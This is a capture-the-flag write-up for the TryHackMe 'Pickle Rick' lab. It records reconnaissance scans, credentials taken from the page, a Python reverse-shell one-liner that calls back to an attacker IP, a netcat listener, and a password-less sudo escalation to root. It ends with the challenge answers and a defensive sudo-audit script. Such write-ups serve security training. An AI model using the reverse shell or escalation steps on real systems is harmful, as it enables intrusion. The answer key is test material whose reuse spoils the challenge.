
TryHackme-Pickle Rick

User 2616264
Published 2023-05-18 11:39:12
Article collected in column: penetration

Task 1 Pickle Rick

This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

┌──(root㉿kali)-[~]
└─# nmap -sV -T4 -A 10.10.102.220
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-07 04:08 EDT
Nmap scan report for 10.10.102.220
Host is up (0.26s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:ab:92:c8:5b:13:fe:8a:e9:09:67:c9:93:f0:dc:22 (RSA)
|   256 4c:ed:3d:e4:8f:97:c7:e3:fc:6b:61:78:3b:fe:2c:37 (ECDSA)
|_  256 69:c3:2a:5d:2d:cc:08:db:ce:ee:2a:c5:d6:5f:10:13 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/7%OT=22%CT=1%CU=37661%PV=Y%DS=2%DC=T%G=Y%TM=642FCF95
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(
OS:R=Y%DF=Y%T=40%W=6903%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   281.69 ms 10.11.0.1
2   281.80 ms 10.10.102.220

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.07 seconds
┌──(root㉿kali)-[~]
└─# dirsearch -u 'http://10.10.102.220'

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/10.10.102.220/_23-04-07_04-13-43.txt

Error Log: /root/.dirsearch/logs/errors-23-04-07_04-13-43.log

Target: http://10.10.102.220/

[04:13:43] Starting: 
[04:13:53] 403 -  299B  - /.ht_wsr.txt                                     
[04:13:53] 403 -  302B  - /.htaccess.bak1                                  
[04:13:53] 403 -  302B  - /.htaccess.orig
[04:13:53] 403 -  304B  - /.htaccess.sample
[04:13:53] 403 -  302B  - /.htaccess.save
[04:13:53] 403 -  303B  - /.htaccess_extra
[04:13:53] 403 -  300B  - /.htaccess_sc
[04:13:53] 403 -  302B  - /.htaccess_orig
[04:13:53] 403 -  300B  - /.htaccessBAK
[04:13:53] 403 -  301B  - /.htaccessOLD2
[04:13:53] 403 -  300B  - /.htaccessOLD
[04:13:54] 403 -  292B  - /.htm                                            
[04:13:54] 403 -  293B  - /.html
[04:13:54] 403 -  298B  - /.htpasswds
[04:13:54] 403 -  302B  - /.htpasswd_test                                  
[04:13:54] 403 -  299B  - /.httr-oauth                                     
[04:13:57] 403 -  293B  - /.php3                                           
[04:13:57] 403 -  292B  - /.php                                            
[04:14:29] 301 -  315B  - /assets  ->  http://10.10.102.220/assets/         
[04:14:29] 200 -    2KB - /assets/                                          
[04:14:54] 200 -    1KB - /index.html                                       
[04:15:00] 200 -  882B  - /login.php                                        
[04:15:20] 200 -   17B  - /robots.txt                                       
[04:15:22] 403 -  302B  - /server-status/                                   
[04:15:22] 403 -  301B  - /server-status                                    
                                                                             
Task Completed

In /robots.txt the string Wubbalubbadubdub was found, and the home page revealed Username: R1ckRul3s. login.php is the login page; log in with the information just found.

Under /portal.php there is an input box that executes commands. The environment has python3, so python is used to get a reverse shell. Sometimes the shell obtained this way has no tty and does not allow direct terminal access, so python can be used to spawn a pseudo-terminal in which commands can be run.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.20.74",7788));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
┌──(root㉿kali)-[~]
└─# nc -lvnp 7788                
listening on [any] 7788 ...
connect to [10.11.20.74] from (UNKNOWN) [10.10.102.220] 48752
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ip-10-10-102-220:/var/www/html$ whoami
whoami
www-data
www-data@ip-10-10-102-220:/var/www/html$ cd /home
cd /home
www-data@ip-10-10-102-220:/home$ ls
ls
rick  ubuntu
www-data@ip-10-10-102-220:/home$ cd rick
cd rick
www-data@ip-10-10-102-220:/home/rick$ ls
ls
second ingredients
www-data@ip-10-10-102-220:/home/rick$ cat second\ ingredients
cat second\ ingredients
1 jerry tear
www-data@ip-10-10-102-220:/home/rick$ sudo -l
sudo -l
Matching Defaults entries for www-data on
    ip-10-10-102-220.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-102-220.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
www-data@ip-10-10-102-220:/home/rick$ sudo bash
sudo bash
root@ip-10-10-102-220:/home/rick# whoami
whoami
root
root@ip-10-10-102-220:/home/rick# cd /root
cld /root
root@ip-10-10-102-220:~# s
ls
3rd.txt  snap
root@ip-10-10-102-220:~# ls
ls
3rd.txt  snap
root@ip-10-10-102-220:~# cat 3rd.txt
cat 3rd.txt
3rd ingredients: fleeb juice
root@ip-10-10-102-220:~#
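The `sudo -l` output above is the entire privilege-escalation path: the web server account may run any command as root with no password. As an added example that is not part of the original writeup, here is a small Python audit that parses `sudo -l` output in the format shown and flags entries a service account should never have; the sample text is constructed from the session above, with one hypothetical scoped rule added for contrast.

```python
import re
from collections import namedtuple

# Constructed sample in the shape of the `sudo -l` output in this writeup, plus one
# hypothetical scoped rule to show what a non-alarming entry looks like.
SAMPLE_SUDO_L = r"""Matching Defaults entries for www-data on
    ip-10-10-102-220.eu-west-1.compute.internal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on
        ip-10-10-102-220.eu-west-1.compute.internal:
    (ALL) NOPASSWD: ALL
    (root) /usr/bin/systemctl restart apache2
"""

# Accounts that should never hold password-less or unrestricted sudo rights.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# One entry as printed by `sudo -l`: "(runas) [NOPASSWD:] cmd, cmd".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(NOPASSWD:\s*)?(.+)$")
USER_RE = re.compile(r"^User (\S+) may run the following commands")

SudoRule = namedtuple("SudoRule", "runas nopasswd commands")

def parse_sudo_l(text):
    """Return (user, [SudoRule, ...]) parsed from `sudo -l` output."""
    user, rules, in_rules = None, [], False
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            user, in_rules = m.group(1), True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:  # lines before the "User ... may run" header are Defaults, not rules
            commands = [c.strip() for c in m.group(3).split(",")]
            rules.append(SudoRule(m.group(1).strip(), bool(m.group(2)), commands))
    return user, rules

def audit(text):
    """Return findings (strings); an empty list means no alarming rule was seen."""
    user, rules = parse_sudo_l(text)
    findings = []
    for r in rules:
        if "ALL" in r.commands:
            findings.append(f"{user} may run ALL commands as ({r.runas})")
        if r.nopasswd and user in SERVICE_ACCOUNTS:
            findings.append(f"service account {user} has NOPASSWD sudo: {', '.join(r.commands)}")
    return findings
```

On a real host, feed it the `sudo -l` output of each service account; the fix for a finding is to delete the rule or scope it to the specific commands the account actually needs.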

1. What is the first ingredient Rick needs?

mr. meeseek hair

2. What's the second ingredient Rick needs?

jerry tear

3. What's the final ingredient Rick needs?

fleeb juice
Originally published: 2023-04-07